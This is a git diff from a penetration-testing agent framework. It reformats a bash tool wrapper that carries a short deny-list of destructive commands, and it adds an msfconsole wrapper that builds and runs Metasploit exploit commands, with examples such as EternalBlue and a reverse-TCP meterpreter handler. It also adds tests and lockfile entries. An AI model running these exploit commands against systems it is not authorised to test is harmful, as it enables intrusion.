+                        "xargs -I {} nmap -sV -p 22,80,443 {}",
                         "# Log analysis with multiple filters",
-                        "cat /var/log/auth.log | grep 'Failed password' | awk '{print $11}' | sort | uniq -c | sort -nr"
-                    ]
-                )
+                        "cat /var/log/auth.log | grep 'Failed password' | awk '{print $11}' | "
+                        "sort | uniq -c | sort -nr",
+                    ],
+                ),
             ],
             requirements=["bash"],
-            tags=["shell", "fallback", "general-purpose", "universal"]
+            tags=["shell", "fallback", "general-purpose", "universal"],
         )
-    
+
     async def validate_availability(self) -> tuple[bool, Optional[str]]:
         """Check if bash is available."""
         try:
-            result = subprocess.run(
-                ["bash", "--version"],
-                capture_output=True,
-                text=True,
-                timeout=5
-            )
+            result = subprocess.run(["bash", "--version"], capture_output=True, text=True, timeout=5)
             if result.returncode == 0:
                 return True, None
             else:
@@ -100,42 +92,34 @@ async def validate_availability(self) -> tuple[bool, Optional[str]]:
             return False, "Bash version check timed out"
         except Exception as e:
             return False, f"Error checking bash availability: {str(e)}"
-    
-    async def execute(
-        self,
-        command: CommandInput,
-        context: ToolContext,
-        **kwargs
-    ) -> ToolResult:
+
+    async def execute(self, command: CommandInput, context: ToolContext, **kwargs) -> ToolResult:
         """Execute a bash command."""
         start_time = time.time()
-        
+
         try:
             # Prepare environment
             env = dict(context.environment_variables)
             env.update(kwargs.get("env", {}))
-            
+
             # Create working directory if it doesn't exist
             work_dir = Path(context.working_directory)
             work_dir.mkdir(parents=True, exist_ok=True)
-            
+
             # Run bash command
             process = await asyncio.create_subprocess_shell(
                 command.command,
                 stdout=asyncio.subprocess.PIPE,
                 stderr=asyncio.subprocess.PIPE,
                 cwd=context.working_directory,
-                env=env if env else None
+                env=env if env else None,
             )
-            
+
             # Set up timeout
             timeout = command.timeout_sec or context.timeout_override or 300
-            
+
             try:
-                stdout, stderr = await asyncio.wait_for(
-                    process.communicate(),
-                    timeout=timeout
-                )
+                stdout, stderr = await asyncio.wait_for(process.communicate(), timeout=timeout)
             except asyncio.TimeoutError:
                 process.kill()
                 await process.wait()
@@ -145,15 +129,15 @@ async def execute(
                     error="Command timed out",
                     exit_code=124,  # Standard timeout exit code
                     execution_time=timeout,
-                    metadata={"timeout": True, "command": command.command}
+                    metadata={"timeout": True, "command": command.command},
                 )
-            
+
             # Decode output
-            output = stdout.decode('utf-8', errors='replace') if stdout else ""
-            error = stderr.decode('utf-8', errors='replace') if stderr else ""
-            
+            output = stdout.decode("utf-8", errors="replace") if stdout else ""
+            error = stderr.decode("utf-8", errors="replace") if stderr else ""
+
             execution_time = time.time() - start_time
-            
+
             return ToolResult(
                 success=process.returncode == 0,
                 output=output,
@@ -163,10 +147,10 @@ async def execute(
                 metadata={
                     "command": command.command,
                     "working_directory": context.working_directory,
-                    "run_id": context.run_id
-                }
+                    "run_id": context.run_id,
+                },
             )
-            
+
         except Exception as e:
             return ToolResult(
                 success=False,
@@ -174,42 +158,33 @@ async def execute(
                 error=f"Execution error: {str(e)}",
                 exit_code=-1,
                 execution_time=time.time() - start_time,
-                metadata={"command": command.command, "error_type": type(e).__name__}
+                metadata={"command": command.command, "error_type": type(e).__name__},
             )
-    
+
     def generate_command(
-        self,
-        capability: str,
-        parameters: Dict[str, Any],
-        context: Optional[ToolContext] = None
+        self, capability: str, parameters: Dict[str, Any], context: Optional[ToolContext] = None
     ) -> CommandInput:
         """Generate a bash command for the specified capability."""
         if capability == "execute":
-            return CommandInput(
-                command=parameters["command"],
-                timeout_sec=parameters.get("timeout", 300)
-            )
-            
+            return CommandInput(command=parameters["command"], timeout_sec=parameters.get("timeout", 300))
+
         elif capability == "script":
             # Create a temporary script file and execute it
             script_content = parameters["script"]
             args = parameters.get("args", "")
-            
+
             # For now, use a simple inline approach
             # In production, might want to write to a temp file
             escaped_script = script_content.replace("'", "'\"'\"'")
             command = f"bash -c '{escaped_script}'"
             if args:
                 command += f" {args}"
-            
-            return CommandInput(
-                command=command,
-                timeout_sec=parameters.get("timeout", 300)
-            )
-            
+
+            return CommandInput(command=command, timeout_sec=parameters.get("timeout", 300))
+
         elif capability == "file_ops":
             operation = parameters["operation"]
-            
+
             if operation == "read":
                 command = f"cat '{parameters['source']}'"
             elif operation == "write":
@@ -224,19 +199,16 @@ def generate_command(
                 command = f"mv '{parameters['source']}' '{parameters['target']}'"
             else:
                 raise ValueError(f"Unknown file operation: {operation}")
-            
-            return CommandInput(
-                command=command,
-                timeout_sec=parameters.get("timeout", 60)
-            )
-            
+
+            return CommandInput(command=command, timeout_sec=parameters.get("timeout", 60))
+
         else:
             raise ValueError(f"Unknown capability: {capability}")
-    
+
     def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]:
         """Validate bash command syntax and safety."""
         cmd = command.command.strip()
-        
+
         # Basic safety checks
         dangerous_patterns = [
             "rm -rf /",
@@ -244,15 +216,15 @@ def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]:
             "dd if=/dev/zero",
             "mkfs.",
             "fdisk",
-            "parted"
+            "parted",
         ]
-        
+
         for pattern in dangerous_patterns:
             if pattern in cmd.lower():
                 return False, f"Command contains dangerous pattern: {pattern}"
-        
+
         # Check for empty command
         if not cmd:
             return False, "Command cannot be empty"
-        
-        return True, None# Test change
+
+        return True, None
diff --git a/wish-tools/src/wish_tools/tools/msfconsole.py b/wish-tools/src/wish_tools/tools/msfconsole.py
new file mode 100644
index 0000000..4a64640
--- /dev/null
+++ b/wish-tools/src/wish_tools/tools/msfconsole.py
@@ -0,0 +1,343 @@
+"""
+Metasploit Framework console tool implementation.
+
+This tool provides a non-interactive interface to msfconsole for
+penetration testing workflows in the wish framework.
+"""
+
+import asyncio
+import re
+import subprocess
+import time
+from typing import Any, Dict, Optional
+
+from wish_tools.framework.base import BaseTool, CommandInput, ToolCapability, ToolContext, ToolMetadata, ToolResult
+
+
+class MsfconsoleTool(BaseTool):
+    """Metasploit Framework console tool."""
+
+    def _build_metadata(self) -> ToolMetadata:
+        return ToolMetadata(
+            name="msfconsole",
+            version="1.0.0",
+            description="Metasploit Framework penetration testing tool",
+            author="Wish Framework Team",
+            category="exploitation",
+            capabilities=[
+                ToolCapability(
+                    name="exploit",
+                    description="Run an exploit module against target(s)",
+                    parameters={
+                        "module": "The exploit module path (e.g., exploit/windows/smb/ms17_010_eternalblue)",
+                        "rhosts": "Target host(s) - IP address or range",
+                        "rport": "Target port (optional, module default used if not specified)",
+                        "payload": "Payload to use (optional, module default used if not specified)",
+                        "lhost": "Local host for reverse connection (required for reverse payloads)",
+                        "lport": "Local port for reverse connection (optional, default: 4444)",
+                        "options": "Additional module options as key-value pairs (optional)",
+                    },
+                    examples=[
+                        "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; "
+                        "set LHOST 192.168.1.10; exploit",
+                        "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; "
+                        "set LHOST 192.168.1.10; exploit",
+                    ],
+                ),
+                ToolCapability(
+                    name="auxiliary",
+                    description="Run an auxiliary module (scanners, fuzzers, etc.)",
+                    parameters={
+                        "module": "The auxiliary module path (e.g., auxiliary/scanner/smb/smb_version)",
+                        "rhosts": "Target host(s) - IP address or range",
+                        "rport": "Target port (optional)",
+                        "options": "Additional module options as key-value pairs (optional)",
+                    },
+                    examples=[
+                        "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run",
+                        "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.100; set PORTS 1-1000; run",
+                    ],
+                ),
+                ToolCapability(
+                    name="search",
+                    description="Search for modules by name, platform, or CVE",
+                    parameters={
+                        "query": "Search query (module name, CVE, platform, etc.)",
+                        "type": "Module type filter (optional: exploit, auxiliary, post, payload)",
+                    },
+                    examples=[
+                        "search type:exploit platform:windows smb",
+                        "search cve:2017-0144",
+                        "search apache struts",
+                    ],
+                ),
+                ToolCapability(
+                    name="info",
+                    description="Get detailed information about a module",
+                    parameters={"module": "Full module path to get information about"},
+                    examples=[
+                        "info exploit/windows/smb/ms17_010_eternalblue",
+                        "info auxiliary/scanner/smb/smb_version",
+                    ],
+                ),
+            ],
+            requirements=["metasploit-framework"],
+            tags=["exploitation", "pentesting", "vulnerability", "msf", "metasploit"],
+        )
+
+    async def validate_availability(self) -> tuple[bool, Optional[str]]:
+        """Check if msfconsole is available."""
+        try:
+            result = subprocess.run(["msfconsole", "-v"], capture_output=True, text=True, timeout=10)
+            if result.returncode == 0:
+                return True, None
+            else:
+                return False, "msfconsole returned non-zero exit code"
+        except FileNotFoundError:
+            return False, "msfconsole not found. Please install Metasploit Framework"
+        except subprocess.TimeoutExpired:
+            return False, "msfconsole version check timed out"
+        except Exception as e:
+            return False, f"Error checking msfconsole availability: {str(e)}"
+
+    async def execute(self, command: CommandInput, context: ToolContext, **kwargs) -> ToolResult:
+        """Execute msfconsole command in non-interactive mode."""
+        start_time = time.time()
+
+        try:
+            # Prepare msfconsole command with proper formatting
+            msf_command = self._prepare_msf_command(command.command)
+
+            # Run msfconsole in non-interactive mode
+            process = await asyncio.create_subprocess_exec(
+                "msfconsole",
+                "-q",
+                "-x",
+                msf_command,
+                stdout=asyncio.subprocess.PIPE,
+                stderr=asyncio.subprocess.PIPE,
+                cwd=context.working_directory,
+            )
+
+            # Set up timeout - exploits can take a while
+            timeout = command.timeout_sec or context.timeout_override or 600
+
+            try:
+                stdout, stderr = await asyncio.wait_for(process.communicate(), timeout=timeout)
+            except asyncio.TimeoutError:
+                process.kill()
+                await process.wait()
+                return ToolResult(
+                    success=False,
+                    output="",
+                    error="msfconsole command timed out",
+                    exit_code=124,
+                    execution_time=timeout,
+                    metadata={"timeout": True, "command": msf_command},
+                )
+
+            # Parse output
+            output = stdout.decode("utf-8", errors="replace") if stdout else ""
+            error = stderr.decode("utf-8", errors="replace") if stderr else ""
+
+            # Determine success based on output content and exit code
+            success = self._determine_success(output, error, process.returncode)
+
+            # Extract metadata from output
+            metadata = self._extract_msf_metadata(output)
+            metadata.update(
+                {"command": msf_command, "working_directory": context.working_directory, "run_id": context.run_id}
+            )
+
+            return ToolResult(
+                success=success,
+                output=output,
+                error=error if error else None,
+                exit_code=process.returncode or 0,
+                execution_time=time.time() - start_time,
+                metadata=metadata,
+            )
+
+        except Exception as e:
+            return ToolResult(
+                success=False,
+                output="",
+                error=f"msfconsole execution error: {str(e)}",
+                exit_code=-1,
+                execution_time=time.time() - start_time,
+                metadata={"error_type": type(e).__name__},
+            )
+
+    def generate_command(
+        self, capability: str, parameters: Dict[str, Any], context: Optional[ToolContext] = None
+    ) -> CommandInput:
+        """Generate msfconsole command for the specified capability."""
+        if capability == "exploit":
+            commands = [f"use {parameters['module']}"]
+
+            # Set required parameters
+            commands.append(f"set RHOSTS {parameters['rhosts']}")
+
+            # Set optional parameters
+            if "rport" in parameters:
+                commands.append(f"set RPORT {parameters['rport']}")
+            if "payload" in parameters:
+                commands.append(f"set PAYLOAD {parameters['payload']}")
+            if "lhost" in parameters:
+                commands.append(f"set LHOST {parameters['lhost']}")
+            if "lport" in parameters:
+                commands.append(f"set LPORT {parameters['lport']}")
+
+            # Set additional options
+            if "options" in parameters:
+                for key, value in parameters["options"].items():
+                    commands.append(f"set {key.upper()} {value}")
+
+            # Execute the exploit
+            commands.append("exploit")
+
+            return CommandInput(
+                command="; ".join(commands),
+                timeout_sec=600,  # Exploits may take time
+            )
+
+        elif capability == "auxiliary":
+            commands = [f"use {parameters['module']}"]
+
+            # Set required parameters
+            if "rhosts" in parameters:
+                commands.append(f"set RHOSTS {parameters['rhosts']}")
+
+            # Set optional parameters
+            if "rport" in parameters:
+                commands.append(f"set RPORT {parameters['rport']}")
+
+            # Set additional options
+            if "options" in parameters:
+                for key, value in parameters["options"].items():
+                    commands.append(f"set {key.upper()} {value}")
+
+            # Run the auxiliary module
+            commands.append("run")
+
+            return CommandInput(command="; ".join(commands), timeout_sec=300)
+
+        elif capability == "search":
+            query = parameters["query"]
+            if "type" in parameters:
+                query = f"type:{parameters['type']} {query}"
+
+            return CommandInput(command=f"search {query}", timeout_sec=60)
+
+        elif capability == "info":
+            return CommandInput(command=f"info {parameters['module']}", timeout_sec=30)
+
+        else:
+            raise ValueError(f"Unknown capability: {capability}")
+
+    def _prepare_msf_command(self, command: str) -> str:
+        """Prepare command for msfconsole execution."""
+        # Split commands and clean them up
+        commands = [cmd.strip() for cmd in command.split(";") if cmd.strip()]
+
+        # Ensure we exit cleanly (add if not present)
+        if not any("exit" in cmd.lower() for cmd in commands):
+            commands.append("exit -y")
+
+        return "; ".join(commands)
+
+    def _determine_success(self, output: str, error: str, exit_code: int) -> bool:
+        """Determine if the msfconsole command was successful."""
+        # Check exit code first
+        if exit_code != 0:
+            return False
+
+        # Check for success indicators in output
+        success_indicators = ["Session", "opened", "Auxiliary module execution completed", "Exploit completed"]
+
+        # Check for failure indicators
+        failure_indicators = [
+            "Exploit failed",
+            "Unable to connect",
+            "Connection refused",
+            "No route to host",
+            "Module failed",
+        ]
+
+        output_lower = output.lower()
+
+        # Check for explicit failures
+        for indicator in failure_indicators:
+            if indicator.lower() in output_lower:
+                return False
+
+        # Check for success indicators
+        for indicator in success_indicators:
+            if indicator.lower() in output_lower:
+                return True
+
+        # If no clear indicators, consider successful if no errors
+        return not error or len(error.strip()) == 0
+
+    def _extract_msf_metadata(self, output: str) -> Dict[str, Any]:
+        """Extract metadata from msfconsole output."""
+        metadata = {}
+
+        # Extract session information
+        session_match = re.search(r"Session (\d+) opened", output)
+        if session_match:
+            metadata["session_id"] = int(session_match.group(1))
+            metadata["session_opened"] = True
+
+        # Extract module information
+        module_match = re.search(r"Module: ([\w/]+)", output)
+        if module_match:
+            metadata["module"] = module_match.group(1)
+
+        # Extract target information
+        target_match = re.search(r"RHOSTS\s*=>\s*([\d\.\,\s/]+)", output)
+        if target_match:
+            metadata["targets"] = target_match.group(1).strip()
+
+        # Extract payload information
+        payload_match = re.search(r"PAYLOAD\s*=>\s*([\w/]+)", output)
+        if payload_match:
+            metadata["payload"] = payload_match.group(1)
+
+        # Count found modules (for search results)
+        module_count_match = re.search(r"(\d+)\s+matching modules", output)
+        if module_count_match:
+            metadata["matching_modules"] = int(module_count_match.group(1))
+
+        # Extract vulnerabilities found (for auxiliary modules)
+        if "appears to be vulnerable" in output.lower():
+            metadata["vulnerable"] = True
+
+        return metadata
+
+    def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]:
+        """Validate msfconsole command."""
+        cmd = command.command.strip().lower()
+
+        # Check for required msfconsole commands
+        valid_commands = ["use", "set", "exploit", "run", "search", "info", "exit"]
+
+        # Split into individual commands
+        commands = [c.strip() for c in cmd.split(";") if c.strip()]
+
+        for command_part in commands:
+            # Check if command starts with a valid msfconsole command
+            if not any(command_part.startswith(valid_cmd) for valid_cmd in valid_commands):
+                return False, f"Invalid msfconsole command: {command_part}"
+
+        # Check for dangerous module usage (optional safety check)
+        dangerous_modules = [
+            "auxiliary/dos/",  # Denial of service modules
+            "post/windows/manage/killav",  # Antivirus killing
+        ]
+
+        for dangerous in dangerous_modules:
+            if dangerous in cmd:
+                return False, f"Potentially dangerous module detected: {dangerous}"
+
+        return True, None
diff --git a/wish-tools/tests/integrated/test_tool_step_trace.py b/wish-tools/tests/integrated/test_tool_step_trace.py
index eda4ccf..71ed5b9 100644
--- a/wish-tools/tests/integrated/test_tool_step_trace.py
+++ b/wish-tools/tests/integrated/test_tool_step_trace.py
@@ -23,11 +23,7 @@ async def test_step_trace_workflow(mock_post):
     print("HTTPレスポンスをモック:", {"status_code": 200, "body": "Success"})
 
     # 関数の実行
-    result = main(
-        run_id="test-run-id",
-        trace_name="Test Trace",
-        trace_message="Hello, World!"
-    )
+    result = main(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!")
 
     # 結果の出力
     print("結果:", result)
@@ -41,12 +37,8 @@ async def test_step_trace_workflow(mock_post):
     # モックが正しく呼び出されたことを確認
     mock_post.assert_called_once_with(
         "http://host.docker.internal:23456/api/addStepTrace",
-        json={
-            "run_id": "test-run-id",
-            "trace_name": "Test Trace",
-            "trace_message_base64": "SGVsbG8sIFdvcmxkIQ=="
-        },
-        headers={"Content-Type": "application/json"}
+        json={"run_id": "test-run-id", "trace_name": "Test Trace", "trace_message_base64": "SGVsbG8sIFdvcmxkIQ=="},
+        headers={"Content-Type": "application/json"},
     )
 
 
@@ -61,11 +53,7 @@ async def test_step_trace_with_error(mock_post):
     print("HTTP接続エラーをモック: Connection error")
 
     # 関数の実行
-    result = main(
-        run_id="test-run-id",
-        trace_name="Test Trace",
-        trace_message="Hello, World!"
-    )
+    result = main(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!")
 
     # 結果の出力
     print("結果:", result)
@@ -98,11 +86,7 @@ async def test_step_trace_with_long_message(mock_post):
     print(f"長いメッセージを作成: {len(long_message)}文字")
 
     # 関数の実行
-    result = main(
-        run_id="test-run-id",
-        trace_name="Long Message Test",
-        trace_message=long_message
-    )
+    result = main(run_id="test-run-id", trace_name="Long Message Test", trace_message=long_message)
 
     # 結果の出力
     print("結果:", result)
diff --git a/wish-tools/tests/test_tools_framework.py b/wish-tools/tests/test_tools_framework.py
new file mode 100644
index 0000000..8a7d13b
--- /dev/null
+++ b/wish-tools/tests/test_tools_framework.py
@@ -0,0 +1,296 @@
+"""
+Tests for the wish tools framework.
+
+This module contains tests for the core framework functionality
+including tool registration, discovery, and basic execution.
+"""
+
+import tempfile
+
+import pytest
+
+from wish_tools.framework import (
+    BaseTool,
+    CommandInput,
+    TestCase,
+    ToolCapability,
+    ToolContext,
+    ToolMetadata,
+    ToolResult,
+    ToolTester,
+    tool_registry,
+)
+from wish_tools.framework.testing import ExitCodeValidator, OutputValidator
+
+
+class MockTool(BaseTool):
+    """Mock tool for testing."""
+
+    def _build_metadata(self) -> ToolMetadata:
+        return ToolMetadata(
+            name="mock",
+            version="1.0.0",
+            description="Mock tool for testing",
+            author="Test Suite",
+            category="testing",
+            capabilities=[
+                ToolCapability(
+                    name="echo",
+                    description="Echo input text",
+                    parameters={"text": "Text to echo"},
+                    examples=["echo hello world"],
+                )
+            ],
+            requirements=["python"],
+            tags=["test", "mock"],
+        )
+
+    async def validate_availability(self):
+        return True, None
+
+    async def execute(self, command: CommandInput, context: ToolContext, **kwargs):
+        # Mock execution - just echo the command
+        return ToolResult(
+            success=True,
+            output=f"Mock output: {command.command}",
+            error=None,
+            exit_code=0,
+            execution_time=0.1,
+            metadata={"mock": True},
+        )
+
+    def generate_command(self, capability: str, parameters: dict, context=None):
+        if capability == "echo":
+            return CommandInput(command=f"echo {parameters['text']}", timeout_sec=30)
+        raise ValueError(f"Unknown capability: {capability}")
+
+
+class TestToolRegistry:
+    """Test tool registry functionality."""
+
+    def test_register_tool(self):
+        """Test tool registration."""
+        # Clear registry for clean test
+        original_tools = tool_registry._tools.copy()
+        tool_registry._tools.clear()
+
+        try:
+            tool_registry.register_tool(MockTool)
+            assert tool_registry.has_tool("mock")
+            assert "mock" in tool_registry.get_tool_names()
+        finally:
+            # Restore registry
+            tool_registry._tools = original_tools
+
+    def test_get_tool(self):
+        """Test getting tool instance."""
+        # Register mock tool
+        tool_registry.register_tool(MockTool, override=True)
+
+        tool = tool_registry.get_tool("mock")
+        assert isinstance(tool, MockTool)
+        assert tool.metadata.name == "mock"
+
+    def test_list_tools(self):
+        """Test listing all tools."""
+        # Register mock tool
+        tool_registry.register_tool(MockTool, override=True)
+
+        tools = tool_registry.list_tools()
+        tool_names = [t.name for t in tools]
+        assert "mock" in tool_names
+
+    def test_search_tools(self):
+        """Test searching tools."""
+        # Register mock tool
+        tool_registry.register_tool(MockTool, override=True)
+
+        results = tool_registry.search_tools("mock")
+        assert len(results) >= 1
+        assert any(t.name == "mock" for t in results)
+
+    def test_list_by_category(self):
+        """Test listing tools by category."""
+        # Register mock tool
+        tool_registry.register_tool(MockTool, override=True)
+
+        tools = tool_registry.list_by_category("testing")
+        assert "mock" in tools
+
+    def test_list_by_tag(self):
+        """Test listing tools by tag."""
+        # Register mock tool
+        tool_registry.register_tool(MockTool, override=True)
+
+        tools = tool_registry.list_by_tag("test")
+        assert "mock" in tools
+
+
+class TestBaseTool:
+    """Test base tool functionality."""
+
+    def test_tool_metadata(self):
+        """Test tool metadata generation."""
+        tool = MockTool()
+        metadata = tool.metadata
+
+        assert metadata.name == "mock"
+        assert metadata.version == "1.0.0"
+        assert metadata.category == "testing"
+        assert len(metadata.capabilities) == 1
+        assert metadata.capabilities[0].name == "echo"
+
+    def test_get_documentation(self):
+        """Test documentation generation."""
+        tool = MockTool()
+        docs = tool.get_documentation()
+
+        assert "# mock" in docs
+        assert "Mock tool for testing" in docs
+        assert "## Capabilities" in docs
+        assert "### echo" in docs
+
+    @pytest.mark.asyncio
+    async def test_validate_availability(self):
+        """Test availability validation."""
+        tool = MockTool()
+        is_available, error = await tool.validate_availability()
+
+        assert is_available is True
+        assert error is None
+
+    @pytest.mark.asyncio
+    async def test_execute(self):
+        """Test command execution."""
+        tool = MockTool()
+
+        with tempfile.TemporaryDirectory() as temp_dir:
+            context = ToolContext(working_directory=temp_dir, run_id="test")
+
+            command = CommandInput(command="test command", timeout_sec=30)
+            result = await tool.execute(command, context)
+
+            assert result.success is True
+            assert "Mock output: test command" in result.output
+            assert result.exit_code == 0
+
+    def test_generate_command(self):
+        """Test command generation."""
+        tool = MockTool()
+
+        command = tool.generate_command(capability="echo", parameters={"text": "hello world"})
+
+        assert command.command == "echo hello world"
+        assert command.timeout_sec == 30
+
+
+class TestToolTester:
+    """Test tool testing framework."""
+
+    @pytest.mark.asyncio
+    async def test_availability_test(self):
+        """Test availability testing."""
+        tool = MockTool()
+        tester = ToolTester(tool)
+
+        result = await tester.test_availability()
+        assert result.passed is True
+
+    @pytest.mark.asyncio
+    async def test_run_test_case(self):
+        """Test running a test case."""
+        tool = MockTool()
+        tester = ToolTester(tool)
+
+        test_case = TestCase(
+            name="echo_test",
+            description="Test echo functionality",
+            capability="echo",
+            parameters={"text": "hello"},
+            expected_success=True,
+            validators=[OutputValidator(contains="Mock output"), ExitCodeValidator(expected=0)],
+        )
+
+        result = await tester.run_test_case(test_case)
+        assert result.passed is True
+        assert result.tool_result is not None
+        assert result.tool_result.success is True
+
+    def test_generate_report(self):
+        """Test report generation."""
+        tool = MockTool()
+        tester = ToolTester(tool)
+
+        # Create mock results
+        from wish_tools.framework.testing import TestResult
+
+        mock_result = TestResult(
+            test_case=TestCase(
+                name="test",
+                description="Test case",
+                capability="echo",
+                parameters={},
+                expected_success=True,
+                validators=[],
+            ),
+            passed=True,
+            execution_time=0.1,
+            tool_result=ToolResult(
+                success=True, output="test output", error=None, exit_code=0, execution_time=0.1, metadata={}
+            ),
+            error=None,
+            validation_errors=[],
+        )
+
+        report = tester.generate_report([mock_result])
+        assert "# Test Report for mock" in report
+        assert "✅ PASSED" in report
+        assert "test output" in report
+
+
+@pytest.mark.integration
+class TestRealTools:
+    """Integration tests with real tools (if available)."""
+
+    @pytest.mark.asyncio
+    async def test_bash_tool(self):
+        """Test bash tool if available."""
+        try:
+            from wish_tools.tools.bash import BashTool
+
+            tool = BashTool()
+            is_available, _ = await tool.validate_availability()
+
+            if is_available:
+                with tempfile.TemporaryDirectory() as temp_dir:
+                    context = ToolContext(working_directory=temp_dir, run_id="test")
+
+                    command = CommandInput(command="echo 'test'", timeout_sec=30)
+                    result = await tool.execute(command, context)
+
+                    assert result.success is True
+                    assert "test" in result.output
+        except ImportError:
+            pytest.skip("BashTool not available")
+
+    @pytest.mark.asyncio
+    async def test_tool_documentation_generation(self):
+        """Test that all tools can generate documentation."""
+        try:
+            from wish_tools.tools import BashTool, MsfconsoleTool
+
+            for tool_class in [BashTool, MsfconsoleTool]:
+                tool = tool_class()
+                docs = tool.get_documentation()
+
+                # Basic documentation structure checks
+                assert f"# {tool.metadata.name}" in docs
+                assert "## Requirements" in docs
+                assert "## Capabilities" in docs
+
+        except ImportError:
+            pytest.skip("Tool imports not available")
+
+
+if __name__ == "__main__":
+    pytest.main([__file__])
diff --git a/wish-tools/tests/unit/test_tool_step_trace.py b/wish-tools/tests/unit/test_tool_step_trace.py
index d7ec6bf..b722aa2 100644
--- a/wish-tools/tests/unit/test_tool_step_trace.py
+++ b/wish-tools/tests/unit/test_tool_step_trace.py
@@ -24,11 +24,7 @@ class TestToolStepTrace:
     def test_encode_trace_message(self):
         """Test encoding trace message to Base64."""
         # Setup
-        state = StepTraceState(
-            run_id="test-run-id",
-            trace_name="Test Trace",
-            trace_message="Hello, World!"
-        )
+        state = StepTraceState(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!")
 
         # Call function
         result = encode_trace_message(state)
@@ -53,7 +49,7 @@ def test_post_step_trace_success(self, mock_post):
             run_id="test-run-id",
             trace_name="Test Trace",
             trace_message="Hello, World!",
-            trace_message_base64="SGVsbG8sIFdvcmxkIQ=="
+            trace_message_base64="SGVsbG8sIFdvcmxkIQ==",
         )
 
         # Call function
@@ -70,12 +66,8 @@ def test_post_step_trace_success(self, mock_post):
         # Verify mock was called with correct parameters
         mock_post.assert_called_once_with(
             "http://host.docker.internal:23456/api/addStepTrace",
-            json={
-                "run_id": "test-run-id",
-                "trace_name": "Test Trace",
-                "trace_message_base64": "SGVsbG8sIFdvcmxkIQ=="
-            },
-            headers={"Content-Type": "application/json"}
+            json={"run_id": "test-run-id", "trace_name": "Test Trace", "trace_message_base64": "SGVsbG8sIFdvcmxkIQ=="},
+            headers={"Content-Type": "application/json"},
         )
 
     @patch("wish_tools.tool_step_trace.requests.post")
@@ -89,7 +81,7 @@ def test_post_step_trace_error(self, mock_post):
             run_id="test-run-id",
             trace_name="Test Trace",
             trace_message="Hello, World!",
-            trace_message_base64="SGVsbG8sIFdvcmxkIQ=="
+            trace_message_base64="SGVsbG8sIFdvcmxkIQ==",
         )
 
         # Call function
@@ -119,19 +111,12 @@ def test_main_success(self, mock_build_graph):
         # Setup mock
         mock_graph = MagicMock()
         mock_workflow = MagicMock()
-        mock_workflow.invoke.return_value = {
-            "response_status_code": 200,
-            "response_body": "Success"
-        }
+        mock_workflow.invoke.return_value = {"response_status_code": 200, "response_body": "Success"}
         mock_graph.compile.return_value = mock_workflow
         mock_build_graph.return_value = mock_graph
 
         # Call function
-        result = main(
-            run_id="test-run-id",
-            trace_name="Test Trace",
-            trace_message="Hello, World!"
-        )
+        result = main(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!")
 
         # Verify result
         assert result["status_code"] == 200
@@ -149,11 +134,7 @@ def test_main_error(self, mock_build_graph):
         mock_build_graph.side_effect = Exception("Test error")
 
         # Call function
-        result = main(
-            run_id="test-run-id",
-            trace_name="Test Trace",
-            trace_message="Hello, World!"
-        )
+        result = main(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!")
 
         # Verify result
         assert result["status_code"] == 599
diff --git a/wish-tools/uv.lock b/wish-tools/uv.lock
index 83efd98..b1c60ee 100644
--- a/wish-tools/uv.lock
+++ b/wish-tools/uv.lock
@@ -96,6 +96,15 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/7c/fc/6a8cb64e5f0324877d503c854da15d76c1e50eb722e320b15345c4d0c6de/cffi-1.17.1-cp313-cp313-win_amd64.whl", hash = "sha256:f6a16c31041f09ead72d69f583767292f750d24913dadacf5756b966aacb3f1a", size = 182009 },
 ]
 
+[[package]]
+name = "cfgv"
+version = "3.4.0"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/11/74/539e56497d9bd1d484fd863dd69cbbfa653cd2aa27abfe35653494d85e94/cfgv-3.4.0.tar.gz", hash = "sha256:e52591d4c5f5dead8e0f673fb16db7949d2cfb3f7da4582893288f0ded8fe560", size = 7114 }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/c5/55/51844dd50c4fc7a33b653bfaba4c2456f06955289ca770a5dbd5fd267374/cfgv-3.4.0-py2.py3-none-any.whl", hash = "sha256:b7265b1f29fd3316bfcd2b330d63d024f2bfd8bcb8b0272f8e19a504856c48f9", size = 7249 },
+]
+
 [[package]]
 name = "charset-normalizer"
 version = "3.4.1"
@@ -166,6 +175,15 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/d1/d6/3965ed04c63042e047cb6a3e6ed1a63a35087b6a609aa3a15ed8ac56c221/colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6", size = 25335 },
 ]
 
+[[package]]
+name = "distlib"
+version = "0.3.9"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/0d/dd/1bec4c5ddb504ca60fc29472f3d27e8d4da1257a854e1d96742f15c1d02d/distlib-0.3.9.tar.gz", hash = "sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403", size = 613923 }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/91/a1/cf2472db20f7ce4a6be1253a81cfdf85ad9c7885ffbed7047fb72c24cf87/distlib-0.3.9-py2.py3-none-any.whl", hash = "sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87", size = 468973 },
+]
+
 [[package]]
 name = "exceptiongroup"
 version = "1.2.2"
@@ -199,6 +217,15 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/d7/a1/8936bc8e79af80ca38288dd93ed44ed1f9d63beb25447a4c59e746e01f8d/faker-37.1.0-py3-none-any.whl", hash = "sha256:dc2f730be71cb770e9c715b13374d80dbcee879675121ab51f9683d262ae9a1c", size = 1918783 },
 ]
 
+[[package]]
+name = "filelock"
+version = "3.18.0"
+source = { registry = "https://pypi.org/simple" }
